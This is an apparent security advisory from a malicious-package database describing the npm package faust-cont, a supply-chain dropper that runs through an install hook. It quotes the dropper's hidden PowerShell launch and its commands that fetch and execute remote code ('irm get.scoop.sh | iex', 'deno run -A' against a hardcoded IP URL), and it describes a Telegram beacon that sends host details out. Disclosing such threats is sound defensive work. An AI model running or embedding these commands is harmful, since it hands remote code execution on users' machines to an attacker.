MAL-2026-11042

    Dashboard / Malicious Package / MAL-2026-11042

    MAL-2026-11042

    Published: 21 Jul 2026Last Modified: 11 Sept 2026

    Summary: Malicious code in faust-cont (npm)

    Details: The npm package `faust-cont` is a supply-chain dropper disguised as a benign CLI tool (`index.js` is a decoy that only logs "cli tool install package loaded"). The real behaviour is placed in an install script. An `install` lifecycle hook (`install: node install.js`) executes automatically on `npm install`, before the package is ever imported. On Windows the install script writes a PowerShell script to `%TEMP%\setup.ps1` and launches it hidden and detached (`powershell -WindowStyle Hidden -ExecutionPolicy Bypass`). That script bootstraps a runtime toolchain so execution succeeds on a clean host — it installs scoop (`irm get.scoop.sh | iex`), then winget, then Deno — and finally runs `deno run -A http://172.94.9.157/v028f8cde892b0b74c8.js`, fetching and executing a remote module from a hardcoded raw IP over plain HTTP with all Deno permissions granted (filesystem, network, environment, subprocess). Per the dropper's own comments the remote stage is a server-compiled loader that pulls a second stage which sets up autorun persistence and runs a main payload. The install script also contains a Telegram Bot API beacon that reports OS / architecture / hostname on install (the bot token is blank in the published build). Any Windows workstation or CI runner that installs the package (directly or transitively) hands all-permission remote code execution to the operator. Source: amazon-inspector (6ecd29d4c7b48237d28a9433bcfea361da155e1ed4ebdef265fd661574fe1a5d) The package's npm install lifecycle hook runs install.js, which writes a PowerShell script to %TEMP%\setup.ps1 and launches it via `start /min powershell -WindowStyle Hidden -ExecutionPolicy Bypass` with windowsHide and detached options. The PowerShell script installs the Deno runtime (via winget/scoop) and then invokes `deno run -A http://172.94.9.157/v028f8cde892b0b74c8.js`, fetching unpinned JavaScript from a bare IP over plain HTTP and executing it with all Deno permissions on the installer's Windows host. Separately, install.js collects OS name, architecture, and hostname and POSTs them to a hardcoded api.telegram.org bot endpoint (bot token and chat_id constants are blank in this published artifact, but the exfil path is fully wired and fires unconditionally). Hidden-window and detached execution deliberately conceal the dropper from the installing user.

    Affected packages

    Package

    Name: faust-cont

    Purl: pkg:npm/faust-cont

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    1.0.0
    MAL-2026-11042 | CVE-DB